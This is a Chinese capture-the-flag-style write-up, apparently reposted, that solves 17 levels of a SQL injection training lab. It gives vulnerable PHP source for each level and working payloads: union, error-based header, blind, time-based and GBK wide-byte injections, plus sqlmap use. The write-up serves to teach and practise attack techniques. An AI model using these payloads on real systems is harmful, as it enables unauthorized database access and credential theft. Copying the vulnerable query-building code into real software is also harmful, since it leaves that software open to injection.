【封神台】Sql-Labs wp

admin
admin
admin
140350
文章
117
评论
2022年1月10日03:31:54评论18 views字数 10786阅读35分57秒阅读模式


【封神台】Sql-Labs wp

前言

pass-01

1
2
3
4
5
6
7
8
9
10
11
12
 
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='.$id;
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 显错注入、先判断多少个字段

image-20210725131955354

image-20210725132104676

  • 查表拓展: 1 and exists(select * from user)这种形式可以猜解表是否存在
1
 
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();

image-20210725132232796

  • 查flag表中字段
1
2
 
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from f.columns where table_schema=database() and table_name=0x6572726f725f666c6167; 
//0x6572726f725f666c6167是error_flag的十六进制

image-20210725132608204

  • 拿flag //后面就不截图了
1
 
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;

image-20210725132743133

pass-02

1
2
3
4
5
6
7
8
9
10
11
12
 
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='\''.$id.'\'';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 给id传参加了个单引号,和上题一样的做法差不多,就是1后面加个’来闭合源代码中的单引号,再加个#号url编码也就是%23注释掉后面的单引号,也就可以联合查询了
1
 
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union all select 1,2,flag from error_flag %23;

image-20210725133156333

pass-03

1
2
3
4
5
6
7
8
9
10
11
12
 
sername = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='(\''.$id.'\')';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 上题id是’id’这题是加了个括号(‘id’),不过意思不变,同样是进行构造’)在1后面然后利用注释符#来绕过也就是%23
1
 
http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1') union all select 1,2,flag from error_flag %23;

image-20210725134152613

pass-04

1
2
3
4
5
6
7
8
9
10
11
12
 
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=("'.$id.'")';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 单引号变双引号
1
 
http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union all select 1,2,flag from error_flag %23;

image-20210725134258334

pass-05

1
2
3
4
5
6
7
8
9
10
11
12
 
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];

if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
  • 先用万能密码登陆,获取账号和密码,然后再post注入,利用联合查询生成其他的账号和密码使回显成功,最后用limit 1,1 显示第二行也就是我们联合查询加入进去的账号和密码,然后再注入和上面四题没区别
  • 万能密码登陆

image-20210725141449607

  • 用Hackbard的post注入,找到回显点
1
 
username=admin&password=as4dsa2dsad2a3'  union all select 1,2,3 limit 1,1#

image-20210725141606362

1
 
username=admin&password=as4dsa2dsad2a3'  union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1#

image-20210725141943040

  • 字段
1
 
username=admin&password=as4dsa2dsad2a3'  union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1#

image-20210725142047502

  • 拿flag
1
 
username=admin&password=as4dsa2dsad2a3'  union all select 1,2,flag from flag limit 1,1#

image-20210725142133255

pass-06

1
2
3
4
5
6
7
8
9
10
11
12
 
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =("'.$username.'") and password=("'.$password.'")';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];

if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
  • 双引号后面加个括号
1
 
username=admin&password=as4dsa2dsad2a3")  union all select 1,2,flag from flag limit 1,1#

image-20210725142450880

pass-07

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_USER_AGENT'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';
  • 过滤了单引号,万能密码登陆没用了,看到user_agent的head头中被安插在插入语句中,可以直接sqlmap跑*加包,或者第二种方法用burp跑出密码登陆,再UA中填updatexml来报错直接页面上显示uA中语句错误,第一种方法无脑,就不做了
  • 账号和密码是admin和123456,看源码得知,必须登陆才能执行user-agent下面的语句,$row必须不为空,所以想要报错注入,就必须能登陆成功
  • 登陆成功抓个包

image-20210725150453588

  • 拼接一个完整的insert 并且在其中写一个updatexml报错注入
1
 
'or updatexml(1,concat(0x7e,user()),1),1)#

image-20210725152021021

  • 取表
1
 
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#

image-20210725152142821

  • 取字段和flag
1
 
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1)#

image-20210725152328201

1
 
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#

image-20210725152450350

pass-08

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_REFERER'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO refer (`refer`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';
  • 就是head头中user-agent的插入换成了refer
1
 
Referer: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#

image-20210725153252352

pass-09

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
 
function getip()
{
	if (getenv('HTTP_CLIENT_IP'))
	{
		$ip = getenv('HTTP_CLIENT_IP'); 
	}
	elseif (getenv('HTTP_X_FORWARDED_FOR')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED_FOR');
	}
	elseif (getenv('HTTP_X_FORWARDED')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED');
	}
	elseif (getenv('HTTP_FORWARDED_FOR'))
	{
		$ip = getenv('HTTP_FORWARDED_FOR'); 
	}
	elseif (getenv('HTTP_FORWARDED'))
	{
		$ip = getenv('HTTP_FORWARDED');
	}
	else
	{ 
		$ip = $_SERVER['REMOTE_ADDR'];
	}
	return $ip;
}
$username = $_POST['username'];
$password = $_POST['password'];
$ip = getip();
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';
  • head头中记录我们访问ip的是X-FORWARDED-FOR,因为head头中有时是不显示的,我们自己加一个
1
 
X-FORWARDED-FOR: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#

image-20210725153701899

pass-10

1
2
3
4
5
6
7
8
9
10
 
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id='.$id;
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$news = $row['news'];
}
if($news!== ''){
echo '有数据';}

  • length函数:

    1
    		 
    length(字符串内容)

    这个函数主要是用来测试字符串长度用,在盲注中是用来判断当前查询的字符串长度,例如数据库名,表名的长度。

    substr函数:

    1
    		 
    SUBSTR(字符串内容,从哪截取,截取多长)

    用于分割字符串,将字符串分割成单个,配合ASCII码测试单个字符到底是什么字符。

    ascii函数:

    1
    		 
    ascii(填入字符)

    返回字符的ascii码,将字符转变为数字,将字符都转变为数字,可利用数字大小趋向的特性进行大小比较,从而迅速判断出准确的字符内容。

  • 先用length判断数据库名

image-20210725154941303

image-20210725154916227

  • 再用substr从第一个字符的ascii码开始判断他为什么

image-20210725155127027

image-20210725155232219

  • 我拿起手中的burp来跑起,12字符快

image-20210725155429654

image-20210725155447310

image-20210725155619456

image-20210725160053468

  • 按从1到12的顺序把ascii码写下来准备解码
1
 
107 97 110 119 111 108 111 110 103 120 105 97
  • 了解原理就好了,菜B的我还是sqlmap好用,暂时python脚本还不太会写

image-20210725161831345

pass-11

1
2
3
4
5
6
7
8
9
10
 
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id="'.$id.'"';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$news = $row['news'];
}
if($news!== ''){
echo '有数据';}
  • 原理和上题一模一样就是需要加个单引号和末尾加个注释符%23也就是#

pass-12

1
2
3
4
5
6
7
8
9
10
11
12
 
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];

if($row){
echo '成功登录';}
else{echo '账号密码错误';}
  • 换了个传参方式,但是原理不变

image-20210725162937391

pass-13

1
2
3
4
5
6
7
8
9
 
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id="'.$id.'"';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$news = $row['news'];
}
echo '有数据';
  • 时间盲注的判断方式也是布尔盲注的一种

image-20210725163438518

  • (1)、if(条件,满足条件的返回,不满足田间的返回)

    (2)、sleep(X):休眠X秒

  • 判断数据库的长度

image-20210725170042202

  • 判断数据库的值用substr和ascii
1
 
1" and if(ascii(substr(database(),1,1))>1,sleep(1),1)%23

image-20210725170337323

  • 抓包,然后和布尔盲注是一样的操作,理解原理就行

pass-14

1
2
3
4
5
6
7
8
9
 
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id=(\''.$id.'\')';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$news = $row['news'];
}
echo '有数据';
  • 和上题一模一样,除了”双引号换成’)
1
 
http://inject2.lab.aqlab.cn:81/Pass-14/index.php?id=1') and if(ascii(substr(database(),1,1))>1,sleep(5),1)%23

pass-15

1
2
3
4
5
6
7
8
9
10
11
12
13
 
$username = '';
$password = '';
@$id = addslashes($_GET['id']);
@$sql = 'select *from user where id=\''.$id.'\'';
mysqli_select_db($conn,'****');// 不想让你们知道库名
mysqli_query($conn,"SET NAMES gbk");
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 可以发现有addslashes函数导致我们输入的一些单双引号前面加了个右斜线\,由于右斜线的url编码是%5c,%df%5c会组成一个特殊汉字来进行逃逸,
  • 因为GBK编码默认两个字符为一个汉字, 我们可以通过输入宽字符%df使反斜杠和这个%df形成一个汉字,这样后面的单引号就不会被转义而达到逃逸的效果

image-20210725171608951

  • 输入%df逃逸斜线

image-20210725171818342

  • 接着判断字段长度、等拿flag和第一题一样
1
 
http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1%df' union all select 1,2,3%23

image-20210725171952143

pass-16

1
2
3
4
5
6
7
8
9
10
11
12
13
 
$username = '';
$password = '';
@$id = addslashes($_GET['id']);
@$sql = 'select *from user where id=("'.$id.'")';
mysqli_select_db($conn,'****');// 不想让你们知道库名
mysqli_query($conn,"SET NAMES gbk");
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){  
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 和上题区别不大,就是加了“)的形式
1
 
http://inject2.lab.aqlab.cn:81/Pass-16/index.php?id=1%df") union all select 1,2,3%23

pass-17

1
2
3
4
5
6
7
8
9
10
 
$username = addslashes($_POST['username']);
$password = addslashes($_POST['password']);
$sql = 'select *from user where username =(\''.$username.'\') and password=(\''.$password.'\')';
mysqli_select_db($conn,'******'); //不想告诉你们库名
mysqli_query($conn,"SET NAMES gbk");
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
if($row){
echo '成功登录';}
else{echo '账号密码错误';}
  • 这题是个盲注,但是我还是说一下,post传参由于没有url解码,所以宽字节注入得换个参数,比如“汉”这个字和右下划线组成一个汉字也是可以逃逸的。
  • 成功逃逸

image-20210725172842136

  • 因为是盲注所以嘿嘿,抓包,存123.txt,注意:一定要抓我们自己成功构造登陆的形式加*来让sqlmap跑,不然可能跑不出来

image-20210725173245278

  • sqlmap跑的形式

image-20210725173306539

image-20210725173317389

image-20210725174439030

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:31:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【封神台】Sql-Labs wphttps://cn-sec.com/archives/729972.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息